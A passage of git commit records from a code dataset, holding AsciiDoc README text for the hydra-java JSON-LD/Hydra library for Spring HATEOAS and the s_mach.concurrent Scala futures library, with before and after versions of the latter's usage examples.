\"http:\/\/www.w3.org\/ns\/hydra\/core#\")` annotation in your context.\n- renders spring-hateoas `PagedResources<T>` as `hydra:Collection` with a `hydra:PartialCollectionView`. If you use this feature, make sure you have a `@Term(define = \"hydra\", as = \"http:\/\/www.w3.org\/ns\/hydra\/core#\")` annotation in your context.\n- renders responses with `\"@vocab\" : \"http:\/\/schema.org\/\"` by default; a different `@vocab` can be defined on a class or package using the `@Vocab` annotation.\n- supports vocabularies in addition to the default vocabulary via terms in the `@context`. 
Use `@Term` in conjunction with `@Terms` on a class or package for this.\n- renders `@type` based on the Java class name by default; a vocabulary class can be produced instead using `@Expose` on the Java class.\n- renders attributes assuming that the attribute name is a property in the default vocab defined by `@vocab`. In other words, it renders an `offers` member as `\"offers\"` on a json-ld object with a context defining `\"@vocab\" : \"http:\/\/schema.org\"`, so that you end up with `\"http:\/\/schema.org\/offers\"` as linked data name for your `offers` member. To map a custom attribute name such as `foo` to an existing property in the default vocab or other vocabs, use `@Expose` on the attribute and a term will be created in `@context` which maps your attribute to the vocab property you set as value of `@Expose`.\n- renders Java enums assuming that an enum value name is an enumerated value defined by the default vocab. In json-ld it is not only possible to have attribute names, but also attribute *values* that have linked data names. The idiom to express that is `\"@type\" : \"@vocab\"`. An example of this is http:\/\/schema.org\/OnSitePickup[OnSitePickup], which is an enum value for the property http:\/\/schema.org\/availableDeliveryMethod[availableDeliveryMethod]. If your Java enum value is ON_SITE_PICKUP, it matches the vocab value of OnSitePickup. It will be rendered as ON_SITE_PICKUP and hydra-java will add the necessary definition to the context which makes it clear that ON_SITE_PICKUP is actually `http:\/\/schema.org\/OnSitePickup`. If your Java enum value has a different name than the vocab value, use `@Expose` on the enum value to get a correct representation in the context. Note that you can also expose an enum value from a different vocabulary such as GoodRelations; see below.\n\nAs of version 0.2.0 hydra-java supports hydra:collection, hydra:operation and hydra:IriTemplate as well as reversed terms. To make this possible, you *must* use the `linkTo` and `methodOn` methods of AffordanceBuilder as a drop-in replacement for `ControllerLinkBuilder`. Templated links created by ControllerLinkBuilder will at least be rendered as IriTemplates, but only with limited information about the template variables.\n\nFurthermore, if you use these hydra features, make sure you have a `@Term(define = \"hydra\", as = \"http:\/\/www.w3.org\/ns\/hydra\/core#\")` annotation in your context.\n\n* renders a link to a remote collection as https:\/\/www.w3.org\/community\/hydra\/wiki\/Collection_Design[hydra:collection]. If you define the affordance to the remote collection with `AffordanceBuilder.rel()`, the remote collection gets a `hydra:subject` in its manages block, whereas if you define it with `reverseRel()` you get a `hydra:object`. To learn more about this design, consider the article https:\/\/www.w3.org\/community\/hydra\/wiki\/Collection_Design[Collection Design] in the hydra-cg wiki.\n* renders a templated link as `hydra:IriTemplate`. Method parameters can be annotated with `@Expose` to assign them a property URI; otherwise the variable name will be shown as a term in the current vocab. If you create a link with AffordanceBuilder's linkTo-method facilities and you pass `null` for arguments annotated with `@PathVariable` or `@RequestParam`, it will automatically become a templated link with variables for the `null` arguments.\n* renders a link to method handlers for any *combination* of GET, POST, PUT, PATCH and DELETE as `hydra:operation`. 
In order to express that multiple HTTP methods can be invoked on the same resource, use the `and()` method of AffordanceBuilder. See below for an example.\n* renders a single, manually created, non-templated Link or Affordance in json-ld style.\n* renders a POJO method parameter annotated with `@RequestBody` as expected rdfs:subClassOf. Use `@Expose` on the POJO class for a custom identifier. The setter methods on the bean appear as `hydra:supportedProperty`, and you can annotate them with `@Expose` to give them a semantic identifier. Again see below for an example.\n* uses certain schema.org facilities to describe expected request bodies. For this we need schema.org either as `@vocab` or as a `schema:` term. If you do not use schema.org as `@vocab`, make sure you have a `@Term(define = \"schema\", as = \"http:\/\/schema.org\/\")` in the context.\n** expresses default value and value constraints by means of http:\/\/schema.org\/PropertyValueSpecification. To specify such constraints, use the `@Input` annotation. Available constraints are min, max, step, minLength, maxLength and pattern.\n** expresses supported properties whose value is an object by nesting them via http:\/\/schema.org\/rangeIncludes.\n\n\n== Examples\n\n=== Designing a Hydra API\nSee my article https:\/\/www.w3.org\/community\/hydra\/wiki\/Restbucks_with_Hydra for an example of an ordering flow. There is also a http:\/\/jbosswildfly-escalon.rhcloud.com\/hypermedia-api\/store[Sample Shop] which demonstrates the ideas from the article.\n\n=== Live Demo\n\nUse a ReST client to access a http:\/\/jbosswildfly-escalon.rhcloud.com\/hypermedia-api\/events[Sample Events API] to see the artifact hydra-sample at work. OpenShift sometimes completely shuts down the container; please try several times if you run into server errors when first accessing the sample.\n\nBrowsers will show the html representation of the API by default, which uses the `XhtmlResourceMessageConverter`. Sending `Accept: application\/ld+json` will get you hydra, but `application\/json` or `application\/hal+json` work as well. \nWhen you POST or PUT, make sure you add a Content-Type header matching your request.\n\n\n=== Exposing Java Bean Attributes\n\nThe example below shows a Java enum named `BusinessFunction` whose enum values are exposed as values from GoodRelations. The enum appears on an Offer object with a GoodRelations term:\n\n[source, Java]\n----\n enum BusinessFunction {\n @Expose(\"gr:LeaseOut\")\n RENT,\n @Expose(\"gr:Sell\")\n FOR_SALE,\n @Expose(\"gr:Buy\")\n BUY\n }\n\n @Term(define = \"gr\", as = \"http:\/\/purl.org\/goodrelations\/v1#\")\n class Offer {\n public BusinessFunction businessFunction;\n ...\n }\n----\n\nThe json-ld output written by hydra-java makes the GoodRelations url known under the shorthand `gr`, says that the `businessFunction` property contains values defined by a vocabulary and maps the Java enum value `RENT` to its linked data name `\"gr:LeaseOut\"`.\n\n[source, Javascript]\n----\n{\n \"@context\": {\n \"@vocab\": \"http:\/\/schema.org\/\",\n \"gr\": \"http:\/\/purl.org\/goodrelations\/v1#\",\n \"businessFunction\": {\"@type\": \"@vocab\"},\n \"RENT\": \"gr:LeaseOut\"\n },\n \"@type\": \"Offer\",\n \"businessFunction\": \"RENT\"\n}\n----\n\n=== AffordanceBuilder for rich hyperlinks\n\nA hypermedia affordance is a rich hyperlink. 
That means it not only contains a URI or a URITemplate, but also information about the usage of the URI, such as supported http methods and expected parameters. The term 'hypermedia affordance' is a neologism made popular by http:\/\/amundsen.com\/blog\/archives\/1109[Mike Amundsen], following an earlier reference in http:\/\/roy.gbiv.com\/talks\/200804_REST_ApacheCon.pdf[A little REST and Relaxation] by Roy Fielding.\nA hydra-java `Affordance` can be used to render media types which support this kind of information: first and foremost hydra, but it is quite easy to add message converters for other media types once the basic information is available.\n\nVersion 0.2.0 provides an `AffordanceBuilder` class which is a drop-in replacement for the spring-hateoas `ControllerLinkBuilder`. The `AffordanceBuilder` does not depend on hydra or json-ld. It lives in the standalone jar spring-hateoas-ext and can also be used to render media types other than json-ld. One example is the `XhtmlResourceMessageConverter` which allows you to render your API responses as HTML forms.\nUse the `AffordanceBuilder` to build `Affordance` instances which inherit from the spring-hateoas `Link` but add the following traits:\n\n* Full support for all attributes of a http Link header as described by the https:\/\/tools.ietf.org\/html\/rfc5988[web linking rfc 5988]\n* Support for templated link headers as described by the http:\/\/tools.ietf.org\/html\/draft-nottingham-link-template-01[Link-Template Header Internet draft]\n* Improved creation of link templates. You can use the `linkTo-methodOn` technique to create templated links to handler methods. By simply leaving a parameter undefined (`null`) in a `methodOn` sample call, a template variable will be applied to your link.\n* Facility to chain several method invocations on the same resource. If the same link is used to PUT and DELETE a resource, use `AffordanceBuilder.and()` to add both method handlers to the affordance.\n* Action descriptors with information about http methods and expected request data. Based on reflection and a minimal set of annotations it is possible to render form-like affordances with quite precise information about expected input.\n\nIn the following we use `AffordanceBuilder` to add a `self` rel that can be used with GET, PUT and DELETE to an event bean.\nFirst we wrap the event into a `Resource` so we can add affordances to it. 
","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"53a7eb98823a9b6e483869a0a8c2d6e3258be65f","subject":"work on readme [skip ci]","message":"work on readme [skip ci]\n","repos":"S-Mach\/s_mach.concurrent","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"s_mach.concurrent: Futures utility library\n===============================================================\nLance Gatlin <lance.gatlin@gmail.com>\nv1,13-Jul-2014\n:blogpost-status: unpublished\n:blogpost-categories: s_mach, scala\n\n*UNDER CONSTRUCTION*\n\nimage:https:\/\/travis-ci.org\/S-Mach\/s_mach.concurrent.svg[Build Status, link=\"https:\/\/travis-ci.org\/S-Mach\/s_mach.concurrent\"] image:https:\/\/coveralls.io\/repos\/S-Mach\/s_mach.concurrent\/badge.png[Test Coverage,link=\"https:\/\/coveralls.io\/r\/S-Mach\/s_mach.concurrent\"] https:\/\/github.com\/S-Mach\/s_mach.concurrent[Code] http:\/\/S-Mach.github.io\/s_mach.concurrent[Scaladoc]\n\n+s_mach.concurrent+ is an open-source Scala library that provides concurrent execution flow control primitives for\nworking with the scala.concurrent standard library.\n\n* Adds new flow control primitives +concurrently+, +serially+ and +workers+ for control of collection concurrent operations\n* Adds progress reporting, retry and throttle control for collection concurrent operations\n* Adds +ScheduledExecutionContext+, a wrapper for +java.util.concurrent.ScheduledExecutorService+ that provides a functional style interface for scheduling delayed and periodic tasks\n* Adds non-blocking concurrent control primitives such as +Barrier+, +Latch+, +Lock+, +Semaphore+ and +Queue+\n* Overcomes some design limitations of the scala.concurrent library\n* Provides convenience methods for writing more readable, concise and DRY concurrent code such as +Future.get+, +Future.toTry+ and +Future.fold+\n\n=== Include in SBT\n1. +s_mach.concurrent+ is currently compatible with only Scala 2.11 (but there are plans to add 2.10.4 support)\n2. 
Add to +build.sbt+ OR +~\/.sbt\/{version}\/build.sbt+\n+\n[source,sbt,numbered]\n----\nresolvers += Resolver.sonatypeRepo(\"snapshots\")\n----\n+\n3. Add to +build.sbt+\n+\n[source,sbt,numbered]\n----\nlibraryDependencies += \"net.s_mach\" %% \"concurrent\" % \"0.1-SNAPSHOT\"\n----\n\n\n=== Imports for Examples\nAll code examples assume the following imports:\n[source,scala,numbered]\n----\nimport scala.util._\nimport scala.concurrent._\nimport scala.concurrent.ExecutionContext.Implicits.global\nimport scala.concurrent.duration._\nimport s_mach.concurrent._\nimport s_mach.concurrent.util._\n\ncase class Item(id: String, value: Int, relatedItemId: String)\ndef read(id: String) : Future[Item] = Future { Thread.sleep(1000); println(id); Item(id,id.toInt,(id.toInt+1).toString) }\ndef readFail(id: String) : Future[Item] = Future { Thread.sleep(1000); println(id); throw new RuntimeException(id.toString) }\ndef longRead(id: String) : Future[Item] = Future { Thread.sleep(2000); println(id); Item(id,id.toInt,(id.toInt+1).toString) }\ndef write(id: String, item: Item) : Future[Boolean] = Future { Thread.sleep(1000); println(id); true }\ndef writeFail(id: String, item: Item) : Future[Boolean] = Future { Thread.sleep(1000); println(id); throw new RuntimeException(id.toString) }\n----\n\n=== Transforming and traversing collections serially and concurrently\nA common task when working with futures is transforming or traversing a collection by calling a method that\nreturns a future. The standard idiom for performing this task only provides methods for concurrent operation and, with\nenough nesting, leads to difficult-to-read code:\n\n.Example 1: Transform and traverse collections, standard method\n[source,scala,numbered]\n----\nval oomItemIdBatch = (1 to 10).toList.map(_.toString).grouped(2).toList\nval future = { \/\/ necessary for pasting into repl\n for {\n oomItem <- {\n println(\"Reading...\")\n oomItemIdBatch\n \/\/ Serially perform read of each batch\n .foldLeft(Future.successful(List[Item]())) { (facc, idBatch) =>\n for {\n acc <- facc\n \/\/ Concurrently read batch\n oomItem <- Future.sequence(idBatch.map(read))\n } yield acc ::: oomItem\n }\n }\n _ = println(\"Computing...\")\n oomNewItemBatch = oomItem.map(item => item.copy(value = item.value + 1)).grouped(2).toList\n oomResult <- {\n println(\"Writing...\")\n oomNewItemBatch\n \/\/ Serially perform write of each batch\n .foldLeft(Future.successful(List[Boolean]())) { (facc, itemBatch) =>\n for {\n acc <- facc\n \/\/ Concurrently write batch\n oomResult <- Future.sequence(itemBatch.map(item => write(item.id, item)))\n } yield acc ::: oomResult\n }\n }\n } yield oomResult.forall(_ == true)\n}\n----\n\nThe same code, rewritten using +s_mach.concurrent+:\n\n.Example 2: Using +s_mach.concurrent+ to serially or concurrently transform and traverse collections:\n[source,scala,numbered]\n----\nval oomItemIdBatch = (1 to 10).toList.map(_.toString).grouped(2).toList\nval future = { \/\/ necessary for pasting into repl\n for {\n oomItem <- {\n println(\"Reading...\")\n oomItemIdBatch.serially.flatMap(_.concurrently.map(read))\n }\n _ = println(\"Computing...\")\n oomNewItemBatch = oomItem.map(item => item.copy(value = item.value + 1)).grouped(10).toVector\n oomResult <- {\n println(\"Writing...\")\n oomNewItemBatch.serially.flatMap(_.concurrently.map(item => write(item.id, item)))\n }\n } yield oomResult.forall(_ == true)\n}\n----\n
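\nThe +serially+ and +concurrently+ wrappers can also be used without batching. A minimal sketch with the 1-second `read` stub from the imports section (the exact result types are illustrative):\n\n[source,scala,numbered]\n----\n\/\/ all ten reads are started at once\nval allAtOnce: Future[List[Item]] =\n  (1 to 10).toList.map(_.toString).concurrently.map(read)\n\n\/\/ one read at a time, each starting after the previous completes\nval oneAtATime: Future[List[Item]] =\n  (1 to 10).toList.map(_.toString).serially.map(read)\n----\n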
\n=== Transforming and traversing collections using workers\n\n+s_mach.concurrent+ provides the +workers+ method which allows specifying the maximum number of concurrent operations.\n\n.Example 3: Using +s_mach.concurrent+ workers to transform and traverse collections:\n[source,scala,numbered]\n----\nval oomItemIdBatch = (1 to 10).toList.map(_.toString).grouped(2).toList\nval future = { \/\/ necessary for pasting into repl\n for {\n oomItem <- {\n println(\"Reading...\")\n oomItemIdBatch.workers(2).flatMap(_.workers(4).map(read))\n }\n _ = println(\"Computing...\")\n oomNewItemBatch = oomItem.map(item => item.copy(value = item.value + 1)).grouped(10).toVector\n oomResult <- {\n println(\"Writing...\")\n oomNewItemBatch.workers(2).flatMap(_.workers(4).map(item => write(item.id, item)))\n }\n } yield oomResult.forall(_ == true)\n}\n----\n\n\n=== Adding progress reporting, retry and throttle control to collection concurrent operations\n+s_mach.concurrent+ allows modifying collection concurrent operations (+serially+, +concurrently+ or +workers+) to\nreport progress, retry failures and limit iteration speed to a specific time period.\n\n.Example 4: Adding progress reporting, retry and throttle control to collection concurrent operations\n[source,scala,numbered]\n----\nimport java.net.SocketTimeoutException\n\nval oomItemIdBatch = (1 to 10).toList.map(_.toString).grouped(2).toList\nval future = { \/\/ necessary for pasting into repl\n for {\n oomItem <- {\n println(\"Reading...\")\n oomItemIdBatch\n .serially\n .throttle(6.seconds)\n .flatMap { batch =>\n batch\n .workers\n .progress(500.millis)(progress => println(progress))\n .retry {\n case (_: TimeoutException) :: tail if tail.size < 3 => true\n case (_: SocketTimeoutException) :: tail if tail.size < 3 => true\n case _ => false\n }\n .throttle(3.seconds)\n .map(read)\n }\n }\n _ = println(\"Computing...\")\n oomNewItemBatch = oomItem.map(item => item.copy(value = item.value + 1)).grouped(10).toVector\n oomResult <- {\n println(\"Writing...\")\n oomNewItemBatch.workers(2).flatMap(_.workers(4).map(item => write(item.id, item)))\n }\n } yield oomResult.forall(_ == true)\n}\n----\n\n=== Tuple Concurrently\nWhen first using +Future+ with a for-comprehension, it is natural to assume the following will produce concurrent\noperation:\n\n.Example 5: Incorrect +Future+ concurrency\n[source,scala,numbered]\n----\nfor {\n i1 <- read(\"1\")\n i2 <- read(\"2\")\n i3 <- read(\"3\")\n} yield (i1,i2,i3)\n----\n\nSadly, this code will compile and run just fine, but it will not execute concurrently. To correctly implement concurrent\noperation, the following standard pattern is used:\n\n.Example 6: Correct +Future+ concurrency:\n[source,scala,numbered]\n----\nval f1 = read(\"1\")\nval f2 = read(\"2\")\nval f3 = read(\"3\")\nval future = { \/\/ necessary for pasting into repl\n for {\n i1 <- f1\n i2 <- f2\n i3 <- f3\n } yield (i1,i2,i3)\n}\n----\n\nFor concurrent operation, all of the futures must be started before the for-comprehension. The for-comprehension is a\nmonadic workflow which captures commands that must take place in a specific sequential order. The pattern in example 6\nis necessary because Scala lacks an applicative workflow which captures commands that may be run in any order.\n
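\nAn illustrative timing comparison of the two patterns (a sketch assuming the 1-second `read` stub from the imports section; real timings vary):\n\n[source,scala,numbered]\n----\n\/\/ Example 5 pattern: each read starts only after the previous one completes\nval t0 = System.currentTimeMillis\nAwait.result(\n  for { i1 <- read(\"1\"); i2 <- read(\"2\"); i3 <- read(\"3\") } yield (i1,i2,i3),\n  Duration.Inf)\nprintln(s\"sequential: ${System.currentTimeMillis - t0}ms\") \/\/ ~3000ms\n\n\/\/ Example 6 pattern: all three reads overlap\nval t1 = System.currentTimeMillis\nval (f1,f2,f3) = (read(\"1\"), read(\"2\"), read(\"3\"))\nAwait.result(\n  for { i1 <- f1; i2 <- f2; i3 <- f3 } yield (i1,i2,i3),\n  Duration.Inf)\nprintln(s\"concurrent: ${System.currentTimeMillis - t1}ms\") \/\/ ~1000ms\n----\n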
\n+s_mach.concurrent+ adds the method +concurrently+ which is an applicative workflow specifically for futures. This\nmethod can more concisely express the pattern above:\n\n.Example 7: New +concurrently+ method\n[source,scala,numbered]\n----\nfor {\n (i1,i2,i3) <- concurrently(read(\"1\"), read(\"2\"), read(\"3\"))\n} yield (i1,i2,i3)\n----\n\nIn the example above, all futures are started at the same time and fed to the +concurrently+ method. The method returns\na +Future[(Item,Item,Item)]+ which completes once all supplied futures complete. After this returned Future completes, the\ntuple value results can be extracted using normal Scala idioms. 
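The supplied futures also do not have to share a result type. A sketch, assuming the +concurrently+ overloads accept mixed result types:\n\n[source,scala,numbered]\n----\nval item = Item(\"2\", 2, \"3\")\nval future = { \/\/ necessary for pasting into repl\n for {\n (readItem, writeOk) <- concurrently(read(\"1\"), write(item.id, item))\n } yield if (writeOk) Some(readItem) else None\n}\n----\n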
\nThe +concurrently+ method also fixes problems with\n+scala.concurrent+ exception handling (see the 'Under the hood: +Merge+ method' section below).\n\n=== Under the hood: +Merge+ method\nPowering both the tuple +concurrently+ method and the collection +.concurrently.map+, +.concurrently.flatMap+ and\n+.concurrently.foreach+ methods are the +merge+ and +flatMerge+ methods. The +merge+ method performs the same\nfunction as +Future.sequence+ (it calls +Future.sequence+ internally) but it ensures that the returned future completes\nimmediately after an exception occurs in any of the futures. Because +Future.sequence+ waits on all futures in left\nto right order before completing, an exception thrown at the beginning of the computation by a future at the\nfar right will not be detected until after all other futures have completed. For long running computations, this can\nmean a significant amount of wasted time waiting on futures to complete whose results will be discarded. Also, while\nthe scala parallel collections correctly handle multiple concurrent exceptions, +Future.sequence+ only returns the\nfirst exception encountered. In +Future.sequence+, all further exceptions past the first are discarded. The +merge+ and\n+flatMerge+ methods fix these problems by throwing +ConcurrentThrowable+. +ConcurrentThrowable+ has member methods to\naccess both the first exception thrown and a future of all exceptions thrown during the computation.\n\n.Example 8: +Future.sequence+ gets stuck waiting on longRead to complete and only returns the first exception:\n[source,scala,numbered]\n----\nscala> val t = Future.sequence(Vector(longRead(\"1\"),readFail(\"2\"),readFail(\"3\"),read(\"4\"))).getTry\n3\n4\n2\n1\nt: scala.util.Try[scala.collection.immutable.Vector[Item]] = Failure(java.lang.RuntimeException: 2)\n\nscala>\n----\n\n.Example 9: +merge+ method fails immediately on the first exception and throws +ConcurrentThrowable+, which can retrieve all exceptions:\n[source,scala,numbered]\n----\nscala> val t = Vector(longRead(\"1\"),readFail(\"2\"),readFail(\"3\"),read(\"4\")).merge.getTry\n2\nt: scala.util.Try[scala.collection.immutable.Vector[Item]] = Failure(ConcurrentThrowable(java.lang.RuntimeException: 2))\n3\n\nscala> 4\n1\n\nscala> val allFailures = t.failed.get.asInstanceOf[ConcurrentThrowable].allFailure.get\nallFailures: Vector[Throwable] = Vector(java.lang.RuntimeException: 2, java.lang.RuntimeException: 3)\n----\n","old_contents":"s_mach.concurrent: Futures utility library\n==========================================\nLance Gatlin <lance.gatlin@gmail.com>\nv1,13-Jul-2014\n:blogpost-status: unpublished\n:blogpost-categories: s_mach, scala\n\n*UNDER CONSTRUCTION*\n\nimage:https:\/\/travis-ci.org\/S-Mach\/s_mach.concurrent.svg[Build Status, link=\"https:\/\/travis-ci.org\/S-Mach\/s_mach.concurrent\"] image:https:\/\/coveralls.io\/repos\/S-Mach\/s_mach.concurrent\/badge.png[Test Coverage,link=\"https:\/\/coveralls.io\/r\/S-Mach\/s_mach.concurrent\"] https:\/\/github.com\/S-Mach\/s_mach.concurrent[Code] http:\/\/S-Mach.github.io\/s_mach.concurrent[Scaladoc]\n\n+s_mach.concurrent+ is an open-source Scala library that provides concurrent execution flow control primitives for\nworking with the scala.concurrent standard library.\n\n* Adds new flow control primitives +concurrently+, +serially+ and +workers+ for control of collection concurrent operations\n* Adds progress reporting, retry and throttle control for collection concurrent operations\n* Adds +ScheduledExecutionContext+, a wrapper for +java.util.concurrent.ScheduledExecutorService+ that provides a functional style interface for scheduling delayed and periodic tasks\n* Adds non-blocking concurrent control primitives such as +Barrier+, +Latch+, +Lock+, +Semaphore+ and +Queue+\n* Overcomes some design limitations of the scala.concurrent library\n* Provides convenience methods for writing more readable, concise and DRY concurrent code such as +Future.get+, +Future.toTry+ and +Future.fold+\n\n== Include in SBT\n1. +s_mach.concurrent+ is currently compatible with only Scala 2.11 (but there are plans to add 2.10.4 support)\n2. Add to +build.sbt+ OR +~\/.sbt\/{version}\/build.sbt+\n+\n[source,sbt,numbered]\n----\nresolvers += Resolver.sonatypeRepo(\"snapshots\")\n----\n+\n3. 
Add to +build.sbt+\n+\n[source,sbt,numbered]\n----\nlibraryDependencies += \"net.s_mach\" %% \"concurrent\" % \"0.1-SNAPSHOT\"\n----\n\n\n== Imports for Examples\nAll code examples assume the following imports:\n[source,scala,numbered]\n----\nimport scala.util._\nimport scala.concurrent._\nimport scala.concurrent.ExecutionContext.Implicits.global\nimport scala.concurrent.duration._\nimport s_mach.concurrent._\nimport s_mach.concurrent.util._\n\ncase class Item(id: String, value: Int, relatedItemId: String)\ndef read(id: String) : Future[Item] = Future { Thread.sleep(1000); println(id); Item(id,id.toInt,(id.toInt+1).toString) }\ndef readFail(id: String) : Future[Item] = Future { Thread.sleep(1000); println(id); throw new RuntimeException(id.toString) }\ndef longRead(id: String) : Future[Item] = Future { Thread.sleep(2000); println(id); Item(id,id.toInt,(id.toInt+1).toString) }\ndef write(id: String, item: Item) : Future[Boolean] = Future { Thread.sleep(1000); println(id); true }\ndef writeFail(id: String, item: Item) : Future[Boolean] = Future { Thread.sleep(1000); println(id); throw new RuntimeException(id.toString) }\n----\n\n== Transforming and traversing collections serially and concurrently\nA common task when working with futures is either transforming or traversing a collection that will call a method that\nreturns a future. The standard idiom for performing this task only provides methods for concurrent operation and, with\nenough nesting, leads to difficult to read code:\n\n.Example 1: Transform and traverse collections, standard method\n[source,scala,numbered]\n----\nval oomItemIdBatch = (1 to 10).toList.map(_.toString).grouped(2).toList\nval future = { \/\/ necessary for pasting into repl\n for {\n oomItem <- {\n println(\"Reading...\")\n oomItemIdBatch\n \/\/ Serially perform read of each batch\n .foldLeft(Future.successful(List[Item]())) { (facc, idBatch) =>\n for {\n acc <- facc\n \/\/ Concurrently read batch\n oomItem <- Future.sequence(idBatch.map(read))\n } yield acc ::: oomItem\n }\n }\n _ = println(\"Computing...\")\n oomNewItemBatch = oomItem.map(item => item.copy(value = item.value + 1)).grouped(2).toList\n oomResult <- {\n println(\"Writing...\")\n oomNewItemBatch\n \/\/ Serially perform write of each batch\n .foldLeft(Future.successful(List[Boolean]())) { (facc, itemBatch) =>\n for {\n acc <- facc\n \/\/ Concurrently write batch\n oomResult <- Future.sequence(itemBatch.map(item => write(item.id, item)))\n } yield acc ::: oomResult\n }\n }\n } yield oomResult.forall(_ == true)\n}\n----\n\nThe same code, rewritten using +s_mach.concurrent+:\n\n.Example 2: Using +s_mach.concurrent+ to serially or concurrently transform and traverse collections:\n[source,scala,numbered]\n----\nval oomItemIdBatch = (1 to 10).toList.map(_.toString).grouped(2).toList\nval future = { \/\/ necessary for pasting into repl\n for {\n oomItem <- {\n println(\"Reading...\")\n oomItemIdBatch.serially.flatMap(_.concurrently.map(read))\n }\n _ = println(\"Computing...\")\n oomNewItemBatch = oomItem.map(item => item.copy(value = item.value + 1)).grouped(10).toVector\n oomResult <- {\n println(\"Writing...\")\n oomNewItemBatch.serially.flatMap(_.concurrently.map(item => write(item.id, item)))\n }\n } yield oomResult.forall(_ == true)\n}\n----\n\n== Transforming and traversing collections using workers\n\n+s_mach.concurrent+ provides the +workers+ method which allows specifying the maximum number of concurrent operations.\n\n.Example 3: Using +s_mach.concurrent+ workers to transform and traverse 
collections:\n[source,scala,numbered]\n----\nval oomItemIdBatch = (1 to 10).toList.map(_.toString).grouped(2).toList\nval future = { \/\/ necessary for pasting into repl\n for {\n oomItem <- {\n println(\"Reading...\")\n oomItemIdBatch.workers(2).flatMap(_.workers(4).map(read))\n }\n _ = println(\"Computing...\")\n oomNewItemBatch = oomItem.map(item => item.copy(value = item.value + 1)).grouped(10).toVector\n oomResult <- {\n println(\"Writing...\")\n oomNewItemBatch.workers(2).flatMap(_.workers(4).map(item => write(item.id, item)))\n }\n } yield oomResult.forall(_ == true)\n}\n----\n\n\n== Adding progress reporting, retry and throttle control to collection concurrent operations\n+s_mach.concurrent+ allows modifying collection concurrent operations (+serially+, +concurrently+ or +workers+) to\nreport progress, retry failures and limit iteration speed to a specific time period.\n\n.Example 4: Adding progress reporting, retry and throttle control to collection concurrent operations\n[source,scala,numbered]\n----\nimport java.net.SocketTimeoutException \/\/ in addition to the common imports above\n\nval oomItemIdBatch = (1 to 10).toList.map(_.toString).grouped(2).toList\nval future = { \/\/ necessary for pasting into repl\n for {\n oomItem <- {\n println(\"Reading...\")\n oomItemIdBatch\n .serially\n .throttle(6.seconds)\n .flatMap { batch =>\n batch\n .workers\n .progress(500.millis)(progress => println(progress))\n .retry {\n case (_: TimeoutException) :: tail if tail.size < 3 => true\n case (_: SocketTimeoutException) :: tail if tail.size < 3 => true\n case _ => false\n }\n .throttle(3.seconds)\n .map(read)\n }\n }\n _ = println(\"Computing...\")\n oomNewItemBatch = oomItem.map(item => item.copy(value = item.value + 1)).grouped(10).toVector\n oomResult <- {\n println(\"Writing...\")\n oomNewItemBatch.workers(2).flatMap(_.workers(4).map(item => write(item.id, item)))\n }\n } yield oomResult.forall(_ == true)\n}\n----\n\n== Tuple Concurrently\nWhen first using +Future+ with a for-comprehension, it is natural to assume the following will produce concurrent\noperation:\n\n.Example 5: Incorrect +Future+ concurrency\n[source,scala,numbered]\n----\nfor {\n i1 <- read(\"1\")\n i2 <- read(\"2\")\n i3 <- read(\"3\")\n} yield (i1,i2,i3)\n----\n\nSadly, this code will compile and run just fine, but it will not execute concurrently. To correctly implement concurrent\noperation, the following standard pattern is used:\n\n.Example 6: Correct +Future+ concurrency:\n[source,scala,numbered]\n----\nval f1 = read(\"1\")\nval f2 = read(\"2\")\nval f3 = read(\"3\")\nval future = { \/\/ necessary for pasting into repl\n for {\n i1 <- f1\n i2 <- f2\n i3 <- f3\n } yield (i1,i2,i3)\n}\n----\n\nFor concurrent operation, all of the futures must be started before the for-comprehension. The for-comprehension is a\nmonadic workflow which captures commands that must take place in a specific sequential order. The pattern in example 6\nis necessary because Scala lacks an applicative workflow which captures commands that may be run in any order.\n+s_mach.concurrent+ adds the method +concurrently+ which is an applicative workflow specifically for futures. This\nmethod can more concisely express the pattern above:\n\n.Example 7: New +concurrently+ method\n[source,scala,numbered]\n----\nfor {\n (i1,i2,i3) <- concurrently(read(\"1\"), read(\"2\"), read(\"3\"))\n} yield (i1,i2,i3)\n----\n\nIn the example above, all futures are started at the same time and fed to the +concurrently+ method. The method returns\na +Future[(Int,Int,Int)]+ which completes once all supplied futures complete. 
After this returned Future completes, the\ntuple value results can be extracted using normal Scala idioms. The +concurrently+ method also fixes problems with\n+scala.concurrent+ exception handling (see the 'Under the hood: Merge' section below).\n\n== Under the hood: +Merge+ method\nPowering both the tuple +concurrently+ method and the collection +.concurrently.map+, +.concurrently.flatMap+ and\n+.concurrently.foreach+ methods is the +merge+ and +flatMerge+ methods. The +merge+ method performs the same\nfunction as +Future.sequence+ (it calls +Future.sequence+ internally) but it ensures that the returned future completes\nimmediately after an exception occurs in any of the futures. Because +Future.sequence+ waits on all futures in left\nto right order before completing, an exception thrown at the beginning of the computation by a future at the\nfar right will not be detected until after all other futures have completed. For long running computations, this can\nmean a significant amount of wasted time waiting on futures to complete whose results will be discarded. Also, while\nthe scala parallel collections correctly handle multiple concurrent exceptions, +Future.sequence+ only returns the\nfirst exception encountered. In +Future.sequence+, all further exceptions past the first are discarded. The +merge+ and\n+flatMerge+ methods fix these problems by throwing +ConcurrentThrowable+. +ConcurrentThrowable+ has a member method to\naccess both the first exception thrown and a future of all exceptions thrown during the computation.\n\n.Example 8: +Future.sequence+ gets stuck waiting on longRead to complete and only returns the first exception:\n[source,scala,numbered]\n----\nscala> val t = Future.sequence(Vector(longRead(\"1\"),readFail(\"2\"),readFail(\"3\"),read(\"4\"))).getTry\n3\n4\n2\n1\nt: scala.util.Try[scala.collection.immutable.Vector[Item]] = Failure(java.lang.RuntimeException: 2)\n\nscala>\n----\n\n.Example 9: +merge+ method fails immediately on the first exception and throws +ConcurrentThrowable+, which can retrieve all exceptions:\n[source,scala,numbered]\n----\nscala> val t = Vector(longRead(\"1\"),readFail(\"2\"),readFail(\"3\"),read(\"4\")).merge.getTry\n2\nt: scala.util.Try[scala.collection.immutable.Vector[Item]] = Failure(ConcurrentThrowable(java.lang.RuntimeException: 2))\n3\n\nscala> 4\n1\n\nscala> val allFailures = t.failed.get.asInstanceOf[ConcurrentThrowable].allFailure.get\nallFailures: Vector[Throwable] = Vector(java.lang.RuntimeException: 2, java.lang.RuntimeException: 3)\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f61eefb0fcf83933a361b1e7d6b7008152e20005","subject":"fix #197 - mention triava as JCache implementation","message":"fix #197 - mention triava as JCache implementation\n\nSigned-off-by: Sebastian Ho\u00df 